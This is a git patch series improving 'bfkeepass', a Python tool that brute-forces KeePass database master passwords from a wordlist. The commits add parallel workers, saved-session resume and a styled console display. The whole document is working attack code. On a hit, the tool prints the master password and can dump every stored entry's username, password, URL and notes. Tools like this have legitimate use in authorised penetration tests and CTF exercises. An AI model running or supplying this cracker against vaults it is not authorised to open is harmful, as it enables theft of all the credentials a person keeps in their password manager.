From 21ff95d9a649e92d8660bbddee8cb59e210eddfd Mon Sep 17 00:00:00 2001 From: bloodstiller <84631290+bloodstiller@users.noreply.github.com> Date: Sun, 12 Apr 2026 09:42:31 +0100 Subject: [PATCH 1/3] Implement multiprocessing for brute-force password attempts Refactor bfkeepass.py to use multiprocessing for password attempts and improve argument parsing. --- bfkeepass.py | 186 +++++++++++++++++++++++++++++++++++---------------- 1 file changed, 128 insertions(+), 58 deletions(-) diff --git a/bfkeepass.py b/bfkeepass.py index 52541d3..b012164 100644 --- a/bfkeepass.py +++ b/bfkeepass.py @@ -1,62 +1,132 @@ import argparse +import sys +from concurrent.futures import ProcessPoolExecutor, as_completed +from multiprocessing import Manager from pykeepass import PyKeePass +from pykeepass.exceptions import CredentialsError + + +BATCH_SIZE = 200 # Tune based on available memory vs wordlist size + + +def try_password(db_file: str, password: str, stop_flag) -> dict | None: + """Worker: attempt a single password. Returns entry data or None.""" + if stop_flag.is_set(): + return None + try: + kp = PyKeePass(db_file, password=password) + entries = [ + { + "title": entry.title, + "username": entry.username, + "password": entry.password, + "url": entry.url, + "notes": entry.notes, + } + for entry in kp.entries + ] + return {"password": password, "entries": entries} + except CredentialsError: + return None + except Exception as e: + print(f"[WARN] Unexpected error for password '{password}': {e}", file=sys.stderr) + return None + + +def iter_batches(iterable, size: int): + batch = [] + for item in iterable: + batch.append(item) + if len(batch) >= size: + yield batch + batch = [] + if batch: + yield batch + + +def dump_entries(entries: list[dict]) -> None: + print("[>] Dumping entries...") + sep = "-" * 20 + for entry in entries: + print(sep) + for field in ("title", "username", "password", "url", "notes"): + print(f"[>] {field.capitalize()}: {entry[field]}") + print(sep) + print("[>] Entry dump complete.") + def main(): - argParser = argparse.ArgumentParser() - argParser.add_argument("-d", "--database", type=ascii, help="Keepass database file", required=True) - argParser.add_argument("-w", "--wordlist", type=ascii, help="Wordlist to use", required=True) - argParser.add_argument("-o", "--output", help="Output entries on success? (true/false)", action="store_true") - #argParser.add_argument("-l", "--log", help="Log output to a file", action="store_true") - argParser.add_argument("-v", "--verbose", help="Enable verbose output", action="store_true") - args = argParser.parse_args() - - databaseFile = args.database.replace("'", "") - wordlistFile = args.wordlist.replace("'", "") - outputEntries = args.output - verboseOutput = args.verbose - - print(f"[*] Running bfkeepass") - if(verboseOutput): - print(f"[>] Running against database: {databaseFile}") - print(f"[>] Using wordlist: {wordlistFile}") - print("[>] Opening wordlist...") - - try: - with open(wordlistFile, 'r', encoding='unicode_escape') as file: - if(verboseOutput): - print("[>] Successfully opened wordlist.") - print("[*] Starting bruteforce process...") - #for line in file: - for index, line in enumerate(file): - passwordValue=line.strip() - if(verboseOutput): - if((index % 10) == 0): - print(f"[>] Testing value: ({passwordValue})") - try: - # load database (https://github.com/libkeepass/pykeepass) - kp = PyKeePass(databaseFile, password=passwordValue) - print(f"[!] Success! Database password: {passwordValue}") - if(outputEntries): - print("[>] Dumping entries...") - print("-" * 20) - for entry in kp.entries: - print(f"[>] Title: {entry.title}") - print(f"[>] Username: {entry.username}") - print(f"[>] Password: {entry.password}") - print(f"[>] URL: {entry.url}") - print(f"[>] Notes: {entry.notes}") - print("-" * 20) - print("[>] Entry dump complete.") - print("[*] Stopping bruteforce process.") - break - except: - # capture the exception and keep it moving - continue - except FileNotFoundError: - print(f"[ERROR]: The file {wordlistFile} was not found.") - except Exception as e: - print(f"[ERROR]: An error occurred while attempting to load {wordlistFile}: {e}") - print("[*] Done.") - -if __name__ == '__main__': - main() + parser = argparse.ArgumentParser(description="KeePass brute-force tool") + parser.add_argument("-d", "--database", required=True, help="KeePass database file") + parser.add_argument("-w", "--wordlist", required=True, help="Wordlist file") + parser.add_argument("-o", "--output", action="store_true", help="Dump entries on success") + parser.add_argument("-v", "--verbose", action="store_true", help="Verbose output") + parser.add_argument( + "-t", "--threads", type=int, default=4, + help="Parallel worker count (default: 4)" + ) + args = parser.parse_args() + + print("[*] Running bfkeepass") + if args.verbose: + print(f"[>] Database : {args.database}") + print(f"[>] Wordlist : {args.wordlist}") + print(f"[>] Workers : {args.threads}") + print(f"[>] Batch sz : {BATCH_SIZE}") + + try: + wordlist_fh = open(args.wordlist, "r", encoding="unicode_escape") + except FileNotFoundError: + print(f"[ERROR] Wordlist not found: {args.wordlist}", file=sys.stderr) + sys.exit(1) + except OSError as e: + print(f"[ERROR] Could not open wordlist: {e}", file=sys.stderr) + sys.exit(1) + + print("[*] Starting bruteforce...") + found = False + attempt_count = 0 + + with wordlist_fh, Manager() as manager: + stop_flag = manager.Event() + + with ProcessPoolExecutor(max_workers=args.threads) as executor: + for batch in iter_batches( + (line.strip() for line in wordlist_fh if line.strip()), + BATCH_SIZE, + ): + if stop_flag.is_set(): + break + + futures = { + executor.submit(try_password, args.database, pwd, stop_flag): pwd + for pwd in batch + } + + for future in as_completed(futures): + attempt_count += 1 + pwd_tried = futures[future] + + if args.verbose: + print(f"[>] [{attempt_count}] Testing: {pwd_tried}", flush=True) + + result = future.result() + if result: + stop_flag.set() + found = True + print(f"\n[!] Password found: {result['password']}") + if args.output: + dump_entries(result["entries"]) + print("[*] Stopping bruteforce.") + break + + if found: + break + + if not found: + print("[*] Password not found.") + print(f"[*] Done. {attempt_count} passwords attempted.") + + +if __name__ == "__main__": + main() From e6eb3efa61422246893d3f9e79806a579c8e5a60 Mon Sep 17 00:00:00 2001 From: bloodstiller <84631290+bloodstiller@users.noreply.github.com> Date: Tue, 14 Apr 2026 06:36:19 +0100 Subject: [PATCH 2/3] Implement session handling and enhance console UI Add session management and rich console output --- bfkeepass.py | 399 +++++++++++++++++++++++++++++++++++++++++---------- 1 file changed, 323 insertions(+), 76 deletions(-) diff --git a/bfkeepass.py b/bfkeepass.py index b012164..1709acf 100644 --- a/bfkeepass.py +++ b/bfkeepass.py @@ -1,38 +1,145 @@ import argparse +import json import sys from concurrent.futures import ProcessPoolExecutor, as_completed from multiprocessing import Manager +from pathlib import Path + from pykeepass import PyKeePass from pykeepass.exceptions import CredentialsError +from rich.console import Console +from rich.live import Live +from rich.panel import Panel +from rich.progress import ( + BarColumn, + MofNCompleteColumn, + Progress, + SpinnerColumn, + TaskProgressColumn, + TextColumn, + TimeElapsedColumn, +) +from rich.table import Table +from rich.text import Text +from rich.theme import Theme + + +# --------------------------------------------------------------------------- +# Theme / console +# --------------------------------------------------------------------------- + +THEME = Theme({ + "banner": "bold cyan", + "info": "bold white", + "success": "bold green", + "warning": "bold yellow", + "error": "bold red", + "dim": "dim white", + "highlight": "bold magenta", + "label": "cyan", + "value": "white", +}) + +console = Console(theme=THEME) + +BANNER = r""" + _ __ _ +| |__ / _| | _____ __ _ _ __ __ _ ___ +| '_ \ |_| |/ / _ \/ _` | '_ \ / _` / __| +| |_) | _| < __/ (_| | |_) | (_| \__ \ +|_.__/|_| |_|\_\___|\__,_| .__/ \__,_|___/ + |_| +""" + +BATCH_SIZE = 200 +SESSION_FILE = ".bfkeepass_session.json" + + +# --------------------------------------------------------------------------- +# Session helpers +# --------------------------------------------------------------------------- + +def session_key(db_file: str, wordlist_file: str) -> str: + return f"{Path(db_file).resolve()}::{Path(wordlist_file).resolve()}" + + +def load_session(db_file: str, wordlist_file: str) -> int: + if not Path(SESSION_FILE).exists(): + return 0 + try: + with open(SESSION_FILE) as f: + sessions = json.load(f) + entry = sessions.get(session_key(db_file, wordlist_file)) + if entry: + return entry.get("offset", 0) + except Exception: + pass + return 0 -BATCH_SIZE = 200 # Tune based on available memory vs wordlist size +def save_session(db_file: str, wordlist_file: str, offset: int) -> None: + sessions = {} + if Path(SESSION_FILE).exists(): + try: + with open(SESSION_FILE) as f: + sessions = json.load(f) + except Exception: + pass + sessions[session_key(db_file, wordlist_file)] = { + "offset": offset, + "database": db_file, + "wordlist": wordlist_file, + } + with open(SESSION_FILE, "w") as f: + json.dump(sessions, f, indent=2) +def clear_session(db_file: str, wordlist_file: str) -> None: + if not Path(SESSION_FILE).exists(): + return + try: + with open(SESSION_FILE) as f: + sessions = json.load(f) + sessions.pop(session_key(db_file, wordlist_file), None) + with open(SESSION_FILE, "w") as f: + json.dump(sessions, f, indent=2) + except Exception: + pass + + +# --------------------------------------------------------------------------- +# Worker +# --------------------------------------------------------------------------- + def try_password(db_file: str, password: str, stop_flag) -> dict | None: - """Worker: attempt a single password. Returns entry data or None.""" if stop_flag.is_set(): return None try: kp = PyKeePass(db_file, password=password) - entries = [ - { - "title": entry.title, - "username": entry.username, - "password": entry.password, - "url": entry.url, - "notes": entry.notes, - } - for entry in kp.entries - ] - return {"password": password, "entries": entries} + return { + "password": password, + "entries": [ + { + "title": entry.title, + "username": entry.username, + "password": entry.password, + "url": entry.url, + "notes": entry.notes, + } + for entry in kp.entries + ], + } except CredentialsError: return None except Exception as e: - print(f"[WARN] Unexpected error for password '{password}': {e}", file=sys.stderr) + console.print(f" [warning]⚠ Unexpected error for '{password}': {e}[/warning]") return None +# --------------------------------------------------------------------------- +# Utilities +# --------------------------------------------------------------------------- + def iter_batches(iterable, size: int): batch = [] for item in iterable: @@ -44,88 +151,228 @@ def iter_batches(iterable, size: int): yield batch +def make_password_gen(fh, skip: int): + for i, line in enumerate(fh): + if i < skip: + continue + pw = line.strip() + if pw: + yield pw + + def dump_entries(entries: list[dict]) -> None: - print("[>] Dumping entries...") - sep = "-" * 20 - for entry in entries: - print(sep) + console.print() + for i, entry in enumerate(entries, 1): + t = Table( + title=f"Entry {i} — {entry['title'] or '(no title)'}", + show_header=False, + border_style="cyan", + title_style="bold cyan", + min_width=50, + ) + t.add_column("Field", style="label", no_wrap=True) + t.add_column("Value", style="value") for field in ("title", "username", "password", "url", "notes"): - print(f"[>] {field.capitalize()}: {entry[field]}") - print(sep) - print("[>] Entry dump complete.") + t.add_row(field.capitalize(), str(entry[field] or "")) + console.print(t) + console.print() -def main(): - parser = argparse.ArgumentParser(description="KeePass brute-force tool") - parser.add_argument("-d", "--database", required=True, help="KeePass database file") - parser.add_argument("-w", "--wordlist", required=True, help="Wordlist file") - parser.add_argument("-o", "--output", action="store_true", help="Dump entries on success") - parser.add_argument("-v", "--verbose", action="store_true", help="Verbose output") - parser.add_argument( - "-t", "--threads", type=int, default=4, - help="Parallel worker count (default: 4)" +def print_config_table(args, resume_offset: int) -> None: + t = Table(show_header=False, border_style="dim", padding=(0, 1)) + t.add_column("Key", style="label", no_wrap=True) + t.add_column("Value", style="value") + t.add_row("Database", args.database) + t.add_row("Wordlist", args.wordlist) + t.add_row("Workers", str(args.threads)) + t.add_row("Batch size", str(BATCH_SIZE)) + t.add_row("Resume from", f"line {resume_offset}" if resume_offset else "start") + console.print( + Panel(t, title="[banner]Configuration[/banner]", border_style="cyan", padding=(0, 1)) + ) + + +# --------------------------------------------------------------------------- +# Argument parser with rich help +# --------------------------------------------------------------------------- + +class RichHelpFormatter(argparse.HelpFormatter): + """Wider, cleaner help layout.""" + def __init__(self, prog): + super().__init__(prog, max_help_position=36, width=90) + + +def build_parser() -> argparse.ArgumentParser: + parser = argparse.ArgumentParser( + prog="bfkeepass", + description=" Multithreaded KeePass brute-force tool with session resume support.", + formatter_class=RichHelpFormatter, + add_help=False, ) - args = parser.parse_args() - print("[*] Running bfkeepass") + req = parser.add_argument_group("required arguments") + req.add_argument("-d", "--database", required=True, metavar="FILE", help="Path to the KeePass .kdbx database") + req.add_argument("-w", "--wordlist", required=True, metavar="FILE", help="Path to the wordlist file") + + opt = parser.add_argument_group("optional arguments") + opt.add_argument("-o", "--output", action="store_true", help="Dump all entries to stdout on success") + opt.add_argument("-v", "--verbose", action="store_true", help="Print each password attempt in real time") + opt.add_argument("-t", "--threads", type=int, default=4, metavar="N",help="Number of parallel workers (default: 4)") + opt.add_argument("--resume-line", type=int, default=None, metavar="N", help="Skip to a specific line number, ignoring any saved session") + opt.add_argument("--no-resume", action="store_true", help="Ignore saved session and start from line 0") + opt.add_argument("-h", "--help", action="help", help="Show this help message and exit") + return parser + + +# --------------------------------------------------------------------------- +# Main +# --------------------------------------------------------------------------- + +def main(): + parser = build_parser() + args = parser.parse_args() + + # Banner + console.print(Text(BANNER, style="banner")) + console.rule(style="cyan") + + # --- Determine resume offset --- + resume_offset = 0 + if args.resume_line is not None: + resume_offset = args.resume_line + console.print(f" [info]→ Resuming from specified line [highlight]{resume_offset}[/highlight][/info]") + elif not args.no_resume: + resume_offset = load_session(args.database, args.wordlist) + if resume_offset > 0: + console.print( + f" [warning]↩ Saved session found at line [highlight]{resume_offset}[/highlight]. Resume? [y/N][/warning] ", + end="", + ) + answer = input().strip().lower() + if answer == "y": + console.print(f" [info]→ Resuming from line [highlight]{resume_offset}[/highlight][/info]") + else: + resume_offset = 0 + console.print(" [dim]→ Starting fresh.[/dim]") + + console.print() if args.verbose: - print(f"[>] Database : {args.database}") - print(f"[>] Wordlist : {args.wordlist}") - print(f"[>] Workers : {args.threads}") - print(f"[>] Batch sz : {BATCH_SIZE}") + print_config_table(args, resume_offset) + console.print() + # --- Open wordlist --- try: wordlist_fh = open(args.wordlist, "r", encoding="unicode_escape") except FileNotFoundError: - print(f"[ERROR] Wordlist not found: {args.wordlist}", file=sys.stderr) + console.print(f" [error]✗ Wordlist not found: {args.wordlist}[/error]") sys.exit(1) except OSError as e: - print(f"[ERROR] Could not open wordlist: {e}", file=sys.stderr) + console.print(f" [error]✗ Could not open wordlist: {e}[/error]") sys.exit(1) - print("[*] Starting bruteforce...") - found = False + found = False attempt_count = 0 + batch_offset = resume_offset - with wordlist_fh, Manager() as manager: - stop_flag = manager.Event() + # Build the live progress display + progress = Progress( + SpinnerColumn(spinner_name="dots", style="cyan"), + TextColumn("[info]Attempting[/info]"), + BarColumn(bar_width=30, style="cyan", complete_style="green"), + TaskProgressColumn(), + MofNCompleteColumn(), + TimeElapsedColumn(), + TextColumn("[dim]│[/dim]"), + TextColumn("[label]Line[/label] [highlight]{task.fields[line]}[/highlight]"), + TextColumn("[dim]│[/dim]"), + TextColumn("[dim]{task.fields[current]}[/dim]"), + console=console, + transient=False, + ) - with ProcessPoolExecutor(max_workers=args.threads) as executor: - for batch in iter_batches( - (line.strip() for line in wordlist_fh if line.strip()), - BATCH_SIZE, - ): - if stop_flag.is_set(): - break + try: + with wordlist_fh, Manager() as manager: + stop_flag = manager.Event() - futures = { - executor.submit(try_password, args.database, pwd, stop_flag): pwd - for pwd in batch - } + with progress: + task = progress.add_task( + "bruteforce", + total=None, + line=resume_offset, + current="—", + ) + + with ProcessPoolExecutor(max_workers=args.threads) as executor: + for batch in iter_batches( + make_password_gen(wordlist_fh, resume_offset), BATCH_SIZE + ): + if stop_flag.is_set(): + break + + save_session(args.database, args.wordlist, batch_offset) + + futures = { + executor.submit(try_password, args.database, pwd, stop_flag): pwd + for pwd in batch + } + + for future in as_completed(futures): + attempt_count += 1 + pwd_tried = futures[future] + abs_line = batch_offset + attempt_count + + progress.update( + task, + advance=1, + line=abs_line, + current=pwd_tried if args.verbose else "—", + ) - for future in as_completed(futures): - attempt_count += 1 - pwd_tried = futures[future] - - if args.verbose: - print(f"[>] [{attempt_count}] Testing: {pwd_tried}", flush=True) - - result = future.result() - if result: - stop_flag.set() - found = True - print(f"\n[!] Password found: {result['password']}") - if args.output: - dump_entries(result["entries"]) - print("[*] Stopping bruteforce.") - break - - if found: - break - - if not found: - print("[*] Password not found.") - print(f"[*] Done. {attempt_count} passwords attempted.") + result = future.result() + if result: + stop_flag.set() + found = True + progress.stop() + console.print() + console.rule("[success]PASSWORD FOUND[/success]", style="green") + console.print( + Panel( + f"[success] {result['password']}[/success]", + title="[success]✓ Password[/success]", + border_style="green", + padding=(0, 2), + ) + ) + if args.output: + dump_entries(result["entries"]) + break + + if found: + break + + batch_offset += len(batch) + + except KeyboardInterrupt: + console.print() + console.rule("[warning]Interrupted[/warning]", style="yellow") + console.print(f" [warning]↩ Progress saved at line [highlight]{batch_offset}[/highlight][/warning]") + console.print(f" [dim] Re-run without --no-resume to continue.[/dim]") + console.print() + sys.exit(0) + + # --- Footer --- + console.rule(style="cyan") + if found: + clear_session(args.database, args.wordlist) + console.print(f" [success]✓ Session cleared.[/success]") + else: + console.print(f" [dim]✗ Password not found.[/dim]") + + console.print( + f" [dim]Finished.[/dim] [label]Attempts this run:[/label] [highlight]{attempt_count}[/highlight]" + ) + console.rule(style="cyan") + console.print() if __name__ == "__main__": From f4bfa2ccbc07656888c5db2c7a31bfcc584e0e91 Mon Sep 17 00:00:00 2001 From: bloodstiller <84631290+bloodstiller@users.noreply.github.com> Date: Tue, 14 Apr 2026 06:36:35 +0100 Subject: [PATCH 3/3] Add rich library to requirements --- requirements.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/requirements.txt b/requirements.txt index 8b43378..e8e6112 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1 +1,2 @@ pykeepass==4.1.1.post1 +rich